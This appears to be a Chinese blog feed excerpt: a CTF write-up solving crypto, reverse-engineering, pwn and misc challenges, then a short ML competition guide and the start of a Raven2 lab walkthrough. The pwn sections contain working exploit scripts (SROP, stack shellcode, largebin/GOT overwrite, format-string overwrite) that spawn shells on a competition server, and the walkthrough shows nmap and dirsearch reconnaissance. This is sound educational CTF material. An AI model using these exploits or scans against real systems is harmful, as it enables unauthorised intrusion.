gmpy2.gcd(n1, n2) # 计算各自的 Q Q1 = n1 // P Q2 = n2 // P # 解密过程 # 对每个密文计算部分解密结果 c_decrypted = [ pow(c1, gmpy2.invert(E1 // 35, (P - 1) * (Q1 - 1)), n1), pow(c2, gmpy2.invert(E2 // 35, (P - 1) * (Q2 - 1)), n2) ] # 合并解密后的结果 c_combined = c_decrypted[0] * c_decrypted[1] % P c_mod_Q2 = c_decrypted[1] % Q2 c_mod_Q1 = c_decrypted[0] % Q1 # 使用自定义的 solve_crt 函数求解中国剩余定理 final_result = solve_crt([c_mod_Q1, c_mod_Q2, c_combined], [Q1, Q2, P]) # 计算模数 n 和 欧拉函数 phi phi = (Q1 - 1) * (Q2 - 1) n = Q1 * Q2 # 取最终解密后的密文 cipher_m = final_result % n # 指数 e e = 35 # 计算密钥 d (e 与 phi 的 gcd 为 5,所以需要取 7) d = gmpy2.invert(7, phi) # 使用 d 解密最终密文 m = pow(cipher_m, d, n) # 取 5 次方根并将其转换为字符串 decoded_message = long_to_bytes(gmpy2.iroot(m, 5)[0]) print(decoded_message) </code></pre> <p>flag{27dab675-9e9b-4c1f-99ab-dd9fe49c190a}</p> <p><strong>Reverse ez_apk</strong></p> <p>使用jadx打开,不知道为什么我的jeb打开会报错</p> <p><img src="/images/20241021_1729502282-image.png" alt="" /></p> <p>这块是加密的主要代码</p> <p><img src="/images/20241021_1729502287-image.png" alt="" /></p> <p>在资源文件下的rsa -&gt; value -&gt;strings.xml里找到加密后的flag 还有加密过程中使用的Key</p> <p>f`vgvkXknxfznQv|gz|}c|G~bh{{x|VVFGX</p> <p>aptxcony</p> <p>逆向算法解密字符串即可得到flag</p> <pre><code>str = 'f`vg\u007fvkXknxfznQv|gz|\u007f}c|G~bh{{x|\u007fVVFGX' cipher = '' for i in range(0,len(str)): cipher += chr(ord(str[i:i+1]) ^ i) key = ['a', 'p', 't', 'x', 'c', 'o', 'n', 'y'] flag = '' for i in range(0,len(cipher)): if ((cipher[i] != '_') and (cipher[i] != '{') and (cipher[i] != '}')): if (cipher[i] &lt; key[i % len(key)]): flag += chr((ord(cipher[i]) - ord(key[i % len(key)]) + 26) % 26 + 97) else: flag += chr((ord(cipher[i]) - ord(key[i % len(key)])) % 26 + 97) else: flag += cipher[i] print(flag) </code></pre> <p>flag{ez_crypto_algorithm_reverse_haha}</p> <p>Reverse 机器猫</p> <p>使用pyinstxtractor解包反编译2.pyc</p> <pre><code>import turtle def flyTo(x, y): turtle.penup() turtle.goto(x, y) turtle.pendown() def drawEye(): turtle.tracer(False) a = 2.5 for i in range(120): if not 0 &lt;= i &lt; 30: if 60 &lt;= i &lt; 90: a -= 0.05 else: a += 0.05 turtle.left(3) turtle.fd(a) else: turtle.tracer(True) def beard(): flyTo(-37, 135) turtle.seth(165) turtle.fd(60) flyTo(-37, 125) turtle.seth(180) turtle.fd(60) flyTo(-37, 115) turtle.seth(193) turtle.fd(60) flyTo(37, 135) turtle.seth(15) turtle.fd(60) flyTo(37, 125) turtle.seth(0) turtle.fd(60) flyTo(37, 115) turtle.seth(-13) turtle.fd(60) def drawRedScarf(): turtle.fillcolor("red") turtle.begin_fill() turtle.seth(0) turtle.fd(200) turtle.circle(-5, 90) turtle.fd(10) turtle.circle(-5, 90) turtle.fd(207) turtle.circle(-5, 90) turtle.fd(10) turtle.circle(-5, 90) turtle.end_fill() def drawMouse(): flyTo(5, 148) turtle.seth(270) turtle.fd(100) turtle.seth(0) turtle.circle(120, 50) turtle.seth(230) turtle.circle(-120, 100) def drawRedNose(): flyTo(-10, 158) turtle.fillcolor("red") turtle.begin_fill() turtle.circle(20) turtle.end_fill() def drawBlackdrawEye(): turtle.seth(0) flyTo(-20, 195) turtle.fillcolor("#000000") turtle.begin_fill() turtle.circle(13) turtle.end_fill() turtle.pensize(6) flyTo(20, 205) turtle.seth(75) turtle.circle(-10, 150) turtle.pensize(3) flyTo(-17, 200) turtle.seth(0) turtle.fillcolor("#ffffff") turtle.begin_fill() turtle.circle(5) turtle.end_fill() flyTo(0, 0) def drawFace(): turtle.forward(183) turtle.fillcolor("white") turtle.begin_fill() turtle.left(45) turtle.circle(120, 100) turtle.seth(90) drawEye() turtle.seth(180) turtle.penup() turtle.fd(60) turtle.pendown() turtle.seth(90) drawEye() turtle.penup() turtle.seth(180) turtle.fd(64) turtle.pendown() turtle.seth(215) turtle.circle(120, 100) turtle.end_fill() def drawHead(): turtle.penup() turtle.circle(150, 40) turtle.pendown() turtle.fillcolor("#00a0de") turtle.begin_fill() turtle.circle(150, 280) turtle.end_fill() def drawAll(): drawHead() drawRedScarf() drawFace() drawRedNose() drawMouse() beard() flyTo(0, 0) turtle.seth(0) turtle.penup() turtle.circle(150, 50) turtle.pendown() turtle.seth(30) turtle.fd(40) turtle.seth(70) turtle.circle(-30, 270) turtle.fillcolor("#00a0de") turtle.begin_fill() turtle.seth(230) turtle.fd(80) turtle.seth(90) turtle.circle(1000, 1) turtle.seth(-89) turtle.circle(-1000, 10) turtle.seth(180) turtle.fd(70) turtle.seth(90) turtle.circle(30, 180) turtle.seth(180) turtle.fd(70) turtle.seth(100) turtle.circle(-1000, 9) turtle.seth(-86) turtle.circle(1000, 2) turtle.seth(230) turtle.fd(40) turtle.circle(-30, 230) turtle.seth(45) turtle.fd(81) turtle.seth(0) turtle.fd(203) turtle.circle(5, 90) turtle.fd(10) turtle.circle(5, 90) turtle.fd(7) turtle.seth(40) turtle.circle(150, 10) turtle.seth(30) turtle.fd(40) turtle.end_fill() turtle.seth(70) turtle.fillcolor("#FFFFFF") turtle.begin_fill() turtle.circle(-30) turtle.end_fill() flyTo(103.74, -182.59) turtle.seth(0) turtle.fillcolor("#FFFFFF") turtle.begin_fill() turtle.fd(15) turtle.circle(-15, 180) turtle.fd(90) turtle.circle(-15, 180) turtle.fd(10) turtle.end_fill() flyTo(-96.26, -182.59) turtle.seth(180) turtle.fillcolor("#FFFFFF") turtle.begin_fill() turtle.fd(15) turtle.circle(15, 180) turtle.fd(90) turtle.circle(15, 180) turtle.fd(10) turtle.end_fill() flyTo(-133.97, -91.81) turtle.seth(50) turtle.fillcolor("#FFFFFF") turtle.begin_fill() turtle.circle(30) turtle.end_fill() flyTo(-103.42, 15.09) turtle.seth(0) turtle.fd(38) turtle.seth(230) turtle.begin_fill() turtle.circle(90, 260) turtle.end_fill() flyTo(5, -40) turtle.seth(0) turtle.fd(70) turtle.seth(-90) turtle.circle(-70, 180) turtle.seth(0) turtle.fd(70) flyTo(-103.42, 15.09) turtle.fd(90) turtle.seth(70) turtle.fillcolor("#ffd200") turtle.begin_fill() turtle.circle(-20) turtle.end_fill() turtle.seth(170) turtle.fillcolor("#ffd200") turtle.begin_fill() turtle.circle(-2, 180) turtle.seth(10) turtle.circle(-100, 22) turtle.circle(-2, 180) turtle.seth(170) turtle.circle(100, 22) turtle.end_fill() flyTo(-13.42, 15.09) turtle.seth(250) turtle.circle(20, 110) turtle.seth(90) turtle.fd(15) turtle.dot(10) flyTo(0, -150) drawBlackdrawEye() def main(): turtle.screensize(800, 6000, "#F0F0F0") turtle.pensize(3) turtle.speed(9) drawAll() turtle.penup() turtle.goto(100, -300) turtle.write("by peak", font=('Bradley Hand ITC', 30, 'bold')) if __name__ == "__main__": main() turtle.mainloop() print("fVJXNjE0ODBpM2RrZmNSVzYxNDgwaTNka01BSlVPe25oc20=") </code></pre> <p>将fVJXNjE0ODBpM2RrZmNSVzYxNDgwaTNka01BSlVPe25oc20=解base64 逆转字符串 凯撒7</p> <p>flag{HNCTFdw3b08416PKvydw3b08416PK}</p> <p><strong>Reverse 文件分析</strong></p> <p>修改33.cxx的代码,输出所有比较的值</p> <pre><code>#include "22.hxx" #include &lt;iostream&gt; #include &lt;cstdlib&gt; using namespace std; void error() { std::cout &lt;&lt; "Wrong password" &lt;&lt; std::endl; std::exit(-1); } int pow(int x, int n) { int ret(1); for (int i = 1; i &lt;= n; ++i) ret *= x; return ret; } void check_password() { cout&lt;&lt;pow(I-----I,2) * pow(I-----------I,2) + (I---I)&lt;&lt;endl&lt;&lt; pow(I-------I,2) * pow(I-----I,4) - (I---I)&lt;&lt;endl&lt;&lt; (pow(pow(I-------I,2) * pow(I-----I,3) - (I---I),2) - (I-----I)*(I-------I))&lt;&lt;endl&lt;&lt; pow((o-------o | ! ! ! ! ! o-------o).A,2) * (I-----I)+(I---I)&lt;&lt;endl &lt;&lt;pow((o-----------o | ! ! ! ! ! o-----------o).A,2)+(I---I)&lt;&lt;endl&lt;&lt; (pow((o-------------o | ! ! ! ! ! o-------------o).A,2)-(I---I))*(I-----I)*pow(I-------I,2)&lt;&lt;endl&lt;&lt; (o-----------o |L \ | L \ | L \ | o-----------o|! o | ! L | ! L | ! L| ! o-----------o).V*pow(I-----I,2) - pow((o-------o | ! ! ! o-------o).A,2) + (I---I)&lt;&lt;endl&lt;&lt; (o-----------o |L \ | L \ | L \ | L \ | L \ | o-----------o | ! ! o | ! L | ! L | ! L | ! L | ! L| ! o-----------o).V - (I-----I)&lt;&lt;endl&lt;&lt; (o---------------------o |L \ | L \ | L \ | L \ | L \ | L \ | L \ | L \ | o---------------------o | ! ! ! ! ! o | ! L | ! L | ! L | ! L | ! L | ! L | ! L | ! L| ! o---------------------o).V*(pow(I-------I,2) + (I-----I)) + pow(I-----I,6)&lt;&lt;endl&lt;&lt; (o---------o |L \ | L \ | L \ | L \ | o---------o | ! ! ! ! ! o | ! L | ! L | ! L | ! L| ! o---------o).V*(I-------I)*pow(I-----I,4)-(I---I)&lt;&lt;endl&lt;&lt; (o-----------o |L \ | L \ | L \ | L \ | L \ | o-----------o | ! ! o | ! L | ! L | ! L | ! L | ! L| ! o-----------o).V*pow(I-------I,3) - (I-----------I)*((I-----I)*(I-----------I)+(I---I))&lt;&lt;endl&lt;&lt; (o-------------o |L \ | L \ | L \ | L \ | L \ | o-------------o | ! ! o | ! L | ! L | ! L | ! L | ! L| ! o-------------o).V-(I-----------I)&lt;&lt;endl&lt;&lt; "w"&lt;&lt;endl; } int main() { check_password(); std::cout &lt;&lt; "Correct password! It's your flag, bruh" &lt;&lt; std::endl; } </code></pre> <p>Python写代码Z3求解即可</p> <pre><code>from z3 import * I = 1 o = 0 L = 0 password = [Int(f'p{i}') for i in range(12)] solver = Solver() solver.add(And([p &gt;= 0 for p in password])) solver.add(And([p &lt;= 255 for p in password])) solver.add(password[0] + password[1] == 101) solver.add(password[1] + password[2] == 143) solver.add(password[0] * password[2] == 5035) solver.add(password[3] + password[5] == 163) solver.add(password[3] + password[4] == 226) solver.add(password[4] * password[5] == 5814) solver.add(password[7] + password[8] == 205) solver.add(password[6] + password[8] == 173) solver.add(password[6] * password[7] == 9744) solver.add(password[9] + password[10] * password[11] == 5375) solver.add(password[10] + password[9] * password[11] == 4670) solver.add(password[9] + password[10] ==205) if solver.check() == sat: model = solver.model() solution = ''.join(chr(model[p].as_long()) for p in password) print("flag{", solution, "}", sep="") else: print("error") </code></pre> <p>flag{50_pr3TtY_n0}</p> <p><strong>Reverse CSMazeee</strong></p> <p>用ida打开发现有,net壳,用De4Dot ToolKit脱壳,因为有net壳,所以将脱壳后的直接丢到dnspy里</p> <p><img src="/images/20241021_1729502325-image.png" alt="" /> <img src="/images/20241021_1729502331-image.png" alt="" /></p> <p>这里看到需要点100次生成迷宫地图</p> <p><img src="/images/20241021_1729502337-image.png" alt="" /></p> <p>这个array存放迷宫,在mazemake最后面下断点动调100下,在内存中提取迷宫</p> <p><img src="/images/20241021_1729502346-image.png" alt="" /></p> <p>00******0000</p> <p><em>000000</em>0**0</p> <p>***<strong><em>0</em>0</strong>0</p> <p><strong>100*000</strong>0</p> <p><strong><strong>0</strong></strong>**0</p> <p>****00000000</p> <p>rdrrrrrddrruuurrrdddddllllllluull</p> <p>输入走一遍迷宫即可得到flag</p> <p><img src="/images/20241021_1729502356-image.png" alt="" /></p> <p>fIag{4DC8EF9E2B5CABD955DC18BBC6A35B16}</p> <p><strong>Pwn ASM</strong></p> <p>先查一下保护</p> <p><img src="/images/20241021_1729502361-image.png" alt="" /></p> <p>拖进Ida看一下</p> <p><img src="/images/20241021_1729502367-image.png" alt="" /></p> <p>非常简单的程序,直接看到了后门</p> <p>直接在rsp输入,然后栈溢出,将rax输入为0x15,使用srop</p> <p>`from pwn import *<br /> from struct import pack<br /> from ctypes import *</p> <p>from LibcSearcher import *</p> <p>def s(a):<br /> p.send(a)<br /> def sa(a, b):<br /> p.sendafter(a, b)<br /> def sl(a):<br /> p.sendline(a)<br /> def sla(a, b):<br /> p.sendlineafter(a, b)<br /> def r():<br /> p.recv()<br /> def pr():<br /> print(p.recv())<br /> def rl(a):<br /> return p.recvuntil(a)<br /> def inter():<br /> p.interactive()<br /> def debug():<br /> gdb.attach(p)<br /> def get_addr():<br /> return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))<br /> context(os='linux', arch='amd64', log_level='debug')<br /> p= remote('101.200.58.4',10001)</p> <p>elf = ELF('./pwn')<br /> sigFrame=SigreturnFrame()<br /> sigFrame.rax=59<br /> sigFrame.rdi=0x40200A<br /> sigFrame.rsi=0x0<br /> sigFrame.rdx=0x0<br /> sigFrame.rip=0x40102D<br /> payload =p64(0x40103D)+ p64(0x401034)+p64(0x401030)+ p64(0x401034)+p64(0x401030)+ p64(0x401034)+p64(0x401030)+ p64(0x401034)+p64(0x40102D)+flat(sigFrame)</p> <p>p.sendline(payload)</p> <p>p.interactive()`</p> <p>flag{7b74f714-cb8e-46b9-b799-e9a957f6e32f}</p> <p><strong>Pwn ret</strong></p> <p>先查保护</p> <p><img src="/images/20241021_1729502416-image.png" alt="" /></p> <p>Ida看一下</p> <p><img src="/images/20241021_1729502423-image.png" alt="" /></p> <p>Output函数存在格式化字符串漏洞,直接爆破read 0x10引发溢出</p> <p><img src="/images/20241021_1729502427-image.png" alt="" /></p> <p>因为栈是可执行的,所以直接ret到栈上</p> <p>`from pwn import *<br /> from struct import pack<br /> from ctypes import *<br /> from LibcSearcher import *</p> <p>def s(a):<br /> p.send(a)<br /> def sa(a, b):<br /> p.sendafter(a, b)<br /> def sl(a):<br /> p.sendline(a)<br /> def sla(a, b):<br /> p.sendlineafter(a, b)<br /> def r():<br /> p.recv()<br /> def pr():<br /> print(p.recv())<br /> def rl(a):<br /> return p.recvuntil(a)<br /> def inter():<br /> p.interactive()<br /> def debug():<br /> gdb.attach(p)<br /> def get_addr():<br /> return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))<br /> context(os='linux', arch='amd64', log_level='debug')<br /> p = remote("101.200.58.4", 10004)<br /> libc = ELF("./libc.so.6")<br /> elf = ELF('./ret')<br /> payload = b"%6$p"</p> <h1>dbg()</h1> <p>sa(b"ask?",payload)<br /> rl(b"0x")<br /> stack = p.recv(12)<br /> stack = int(stack,16)<br /> print("stack -&gt; ",hex(stack))<br /> rsp_stack = stack - 0x100 - 0x70<br /> rl(b"ok,")<br /> num = rl(b" ")[:-1]<br /> num = int(num)<br /> print(hex(num))<br /> if num &gt; 0x90:<br /> shellcode = asm(shellcraft.sh())<br /> payload = shellcode.ljust(124,b"\xff") + p32(0x100)<br /> payload += p64(stack-0x1000) + p64(rsp_stack)<br /> sla(b"number",payload)<br /> inter()`</p> <p>flag{42dbb41a-3a3a-4f92-8066-034b4f0085d5}</p> <p><strong>Pwm normal pwn</strong></p> <p>先查保护</p> <p><img src="/images/20241021_1729502462-image.png" alt="" /></p> <p>Ida打开</p> <p><img src="/images/20241021_1729502473-image.png" alt="" /></p> <p>发现有uaf漏洞,有一个限制大小的malloc申请****</p> <p><img src="/images/20241021_1729502481-image.png" alt="" /></p> <p>这里只能使用largbin attack,直接打mp_,然后释放进tcache,因为pie没改,所以将改freegot为system拿shell</p> <p>`from pwn import *</p> <p>FILENAME='../pwn17'<br /> elf=ELF(FILENAME)<br /> libc=elf.libc<br /> p = remote("101.200.58.4",2222)<br /> def command(option):<br /> p.recvuntil(b'&gt;')<br /> p.sendline(bytes(str(option),'utf-8'))</p> <p>def create(idx,Size):<br /> command(1)<br /> p.recvuntil(b'Index')<br /> p.sendline(bytes(str(idx),'utf-8'))<br /> p.recvuntil(b'Size')<br /> p.sendline(bytes(str(Size),'utf-8'))</p> <p>def free(id):<br /> command(2)<br /> p.recvuntil(b'Index')<br /> p.sendline(bytes(str(id),'utf-8'))<br /> def edit(id,Content):<br /> command(3)<br /> p.recvuntil(b'Index')<br /> p.sendline(bytes(str(id),'utf-8'))<br /> p.recvuntil(b'Content')<br /> p.send(Content)<br /> def show(id):<br /> command(4)<br /> p.recvuntil(b'Index')<br /> p.sendline(bytes(str(id),'utf-8'))</p> <p>create(0,0x510)<br /> create(1,0x510)<br /> create(2,0x500)</p> <p>free(0)<br /> show(0)<br /> libc_addr=u64_fix(p)<br /> libcbase=libc_addr-0x1f6cc0<br /> dir('libcbase')</p> <p>create(3,0x530)<br /> free(2)<br /> fd=0x1f70f0+libcbase<br /> mp=libcbase+0x1f63a0+0x8<br /> edit(0,p64(fd)+p64(0)*2+p64(mp-0x20))<br /> create(4,0x530)</p> <p>free(4)<br /> target=0x4040e0<br /> edit(0,b'\x00'*0x80+p64(target))<br /> create(5,0x530)<br /> edit(5,p64(0x404000))<br /> system_addr=libcbase+libc.symbols['system']<br /> edit(0,p64(system_addr))<br /> edit(4,b'/bin/sh\x00')<br /> free(4)</p> <p>p.interactive()`</p> <p>flag{06c62ef8-66f9-48f7-9f7d-1d0a17411d1a}</p> <p><strong>Pwn no fmtstr</strong></p> <p>先查保护</p> <p><img src="/images/20241021_1729502526-image.png" alt="" /></p> <p>ida打开发现是Arm程序</p> <p><img src="/images/20241021_1729502536-image.png" alt="" /></p> <p>看到了程序后门</p> <p><img src="/images/20241021_1729502543-image.png" alt="" /></p> <p>并且看到show函数有fmt漏洞,无限制并且有多个指针可以作为跳板利用,直接指向ret的返回地址,然后修改返回地址控制rip</p> <p>`from pwn import *</p> <p>context.arch='aarch64'<br /> p = remote('101.200.58.4',5555)<br /> p.recvuntil('rr ')<br /> stderr = int(p.recvline(),16)<br /> print('stderr:',hex(stderr))</p> <p>def add(idx,size):<br /> p.sendlineafter('e: ', str(ord('a')))<br /> p.sendlineafter('x: ',str(idx))<br /> p.sendlineafter('ze: ',str(size))</p> <p>def edit(idx,data):<br /> p.sendlineafter('e: ', str(ord('e')))<br /> p.sendlineafter('x: ',str(idx))<br /> p.sendafter('t: ',data)</p> <p>def show(idx):<br /> p.sendlineafter('e: ', str(ord('s')))<br /> p.sendlineafter('x: ',str(idx))</p> <p>def generate_fmt_addr16_pre(addr):<br /> if addr==0:<br /> return '%29$hn'<br /> payload = '%'+str(addr)+'c'+'%29$hn'<br /> return payload<br /> def generate_fmt_addr16(addr):<br /> if addr==0:<br /> return '%65$hn'<br /> payload = '%'+str(addr)+'c'+'%65$hn'<br /> return payload</p> <p>def change_addr16(addr):<br /> edit(0, generate_fmt_addr16(addr&amp;0xffff))<br /> show(0)</p> <p>def pwn():<br /> add(0,0x100)<br /> edit(0,'%8$p.%9$p.')<br /> show(0)<br /> p.recvuntil('t: ')<br /> stack = int(p.recvuntil('.')[:-1],16)-0x18<br /> base_addr = int(p.recvuntil('.')[:-1],16)-0xea0<br /> print('stack:',hex(stack))<br /> print('base_addr:',hex(base_addr))<br /> edit(0, generate_fmt_addr16_pre(stack&amp;0xffff))<br /> show(0)<br /> change_addr16(base_addr+0xd40)<br /> p.interactive()<br /> pwn()`</p> <p>flag{252ef11b-3721-436d-b41b-8e86808d27f1}</p> <p>Misc 信息安全大赛的通知</p> <p>flag就在文档里,但是字体被调整成了白色</p> <p>flag{HNCTF9090AS9nbg87600hn77hn88}</p> <p><strong>Misc 编码转换</strong></p> <p>编码1:++++++++[&gt;&gt;++&gt;++++&gt;++++++&gt;++++++++&gt;++++++++++&gt;++++++++++++&gt;++++++++++++++&gt;++++++++++++++++&gt;++++++++++++++++++&gt;++++++++++++++++++++&gt;++++++++++++++++++++++&gt;++++++++++++++++++++++++&gt;++++++++++++++++++++++++++&gt;++++++++++++++++++++++++++++&gt;++++++++++++++++++++++++++++++&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;-]&gt;&gt;&gt;&gt;&gt;&gt;&gt;++++++.&gt;----.&lt;-----.&gt;-----.&gt;-----.&lt;&lt;.+.&lt;&lt;&lt;+++++++.------.&gt;&gt;&gt;+.+.---.&lt;&lt;&lt;.</p> <p>编码2:([]<a href="/images/20241021_image.jpg">(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]</a>+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+([]<a href="/images/20241021_image.jpg">(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]</a>+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(![]+[])[+[]]+[!+[]+!+[]]+[+!+[]]</p> <p>编码3:Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook. Ook.</p> <p>Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook.</p> <p>Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook!</p> <p>Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!</p> <p>Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!</p> <p>Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!</p> <p>Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook. Ook. Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook.</p> <p>Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook!</p> <p>Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook?</p> <p>Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!</p> <p>Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook!</p> <p>Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook.</p> <p>Ook! Ook. Ook! Ook. Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook!</p> <p>Ook! Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook?</p> <p>Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</p> <p>Ook. Ook. Ook! Ook. Ook? Ook.</p> <p>编码一是Brainfuck 编码二是js 直接丢浏览器的控制台就行,编码三是Ook!</p> <p>flag{ab71cda1b495e13b3f21f6fd50221978}</p> <p><strong>Misc Bluetooth</strong></p> <p>用Wireshark打开流量包 字符串搜索flag可以找到三个流量包,将这三个流量包16进制复制到010中去点多余的部分可以得到一个压缩包,流量包里可以看到zip的文件头504b00304 还有压缩了flag.txt和key</p> <p>解压压缩包可以得到flag.txt 和 key</p> <p><img src="/images/20241021_1729502621-image.png" alt="" /></p> <p>flag.txt:10004583275926070044326083910251708233320797779355779208703097816305188140191914132269450797</p> <p>key:5216294695211820293806247029887026154798297270637676463374801674229881314620340407569315152</p> <p>转16进制后异或即可得到flag</p> <p>`flag = 10004583275926070044326083910251708233320797779355779208703097816305188140191914132269450797<br /> key = 5216294695211820293806247029887026154798297270637676463374801674229881314620340407569315152</p> <p>flag_hex = hex(flag)[2:]<br /> key_hex = hex(key)[2:]</p> <h1>使 key_hex 和 flag_hex 的长度相同,进行零填充</h1> <p>max_length = max(len(flag_hex), len(key_hex))<br /> flag_hex = flag_hex.zfill(max_length)<br /> key_hex = key_hex.zfill(max_length)</p> <h1>使用 bytes.fromhex 转换为字节</h1> <p>flag_bytes = bytes.fromhex(flag_hex)<br /> key_bytes = bytes.fromhex(key_hex)</p> <h1>进行逐字节的异或操作</h1> <p>flag_xor = bytes([f ^ k for f, k in zip(flag_bytes, key_bytes)])<br /> print(flag_xor)`</p> <p>flag{66526827ff3ba85e1444a0df4acbba93}</p> <p><strong>Misc coding_analyse</strong></p> <p>936544a55314a7e4339545f47776a6e41315a7d41325743575655455b4478516a6537416</p> <p>先解html 936544a55314a7e4339545f47776a6e41315a7d41325743575655455b4478516a6537416</p> <p>再逆序</p> <p><img src="/images/20241021_1729502603-image.png" alt="" /></p> <p>6147356a6158744b55455657534752314d7a51314e6a67774f5459334e7a41355a445639</p> <p>再解16进制和base64得到</p> <p>hnci{JPEVHdu345680967709d5}</p> <p>凯撒偏移量2得到</p> <p>flag{HNCTFbs345680967709b5}</p> Datawhale AI夏令营|“深度学习(极端降水预测)”方向-baseline笔记https://blog.fiveqm.com/archives/370/https://blog.fiveqm.com/archives/370/Modelscope Notebook 启动与运行指南 Step 1:启动魔搭Notebook 点击链接: 访问 Modelscope Notebook 页面。 选择方式二 GPU环境: 在Notebook设置页面选择“方式二 GPU环境”。 启动Notebook。 Step 2:10分钟一键跑通b...Sun, 28 Jul 2024 11:48:08 GMT<h3>Modelscope Notebook 启动与运行指南</h3> <h4>Step 1:启动魔搭Notebook</h4> <ol> <li><strong>点击链接</strong> : <ul> <li>访问 <a href="https://www.modelscope.cn/my/mynotebook/preset">Modelscope Notebook</a> 页面。</li> </ul> </li> <li><strong>选择方式二 GPU环境</strong> : <ul> <li>在Notebook设置页面选择“方式二 GPU环境”。</li> <li>启动Notebook。</li> </ul> </li> </ol> <h4>Step 2:10分钟一键跑通baseline</h4> <ol> <li><strong>下载baseline文件(大约需要2分钟)</strong> : <ul> <li>在Notebook终端输入以下命令并回车运行:bash复制代码<code>git lfs install git clone https://www.modelscope.cn/datasets/Datawhale/AICamp_earth_baseline.git</code></li> </ul> </li> <li><strong>打开文件,一键运行(大约需要20分钟)</strong> : <ul> <li>进入下载的baseline文件夹。</li> <li>打开并运行相关的Notebook文件。</li> </ul> </li> <li><strong>等待运行完成,下载output.zip文件</strong> : <ul> <li>运行结束后,生成的output.zip文件会在指定的目录中。</li> </ul> </li> </ol> <h4>Step 3:提交文件,获取评分</h4> <ol> <li><strong>提交output.zip文件</strong> : <ul> <li>访问 <a href="http://competition.sais.com.cn/competitionDetail/532234/format">提交链接</a> 页面。</li> <li>上传output.zip文件。</li> </ul> </li> <li><strong>查看评分结果</strong> : <ul> <li>评分过程大约需要2分钟。</li> <li>评分结束后,可以在“我的成绩”处查看评分结果。</li> </ul> </li> </ol> Raven2 wphttps://blog.fiveqm.com/archives/308/https://blog.fiveqm.com/archives/308/先用nmap把内网的靶机扫出来nmap -sn 192.168.199.1-254 再来一个端口扫描nmap -sS -sV -T5 -A -p- 192.168.199.134 能看到端口22,80,111,48744是打开的 先浏览器访问一下80端口 浏览了一圈没发现什么 目录扫描一下dirse...Wed, 17 Jul 2024 15:51:54 GMT<p>先用nmap把内网的靶机扫出来<code>nmap -sn 192.168.199.1-254</code></p> <p><img src="/images/20240717_1721216256-image.png" alt="" /></p> <p>再来一个端口扫描<code>nmap -sS -sV -T5 -A -p- 192.168.199.134</code></p> <p><img src="/images/20240717_1721216357-image.png" alt="" /></p> <p>能看到端口22,80,111,48744是打开的</p> <p>先浏览器访问一下80端口</p> <p><img src="/images/20240717_1721216526-image.png" alt="" /></p> <p>浏览了一圈没发现什么</p> <p>目录扫描一下<code>dirsearch -u 192.168.199.134</code></p> <p><img src="/images/20240717_NDMe2mIAAAAASUVORK5CYII_.jpg" alt="" /></p> <p>扫出了/js /css /vendor 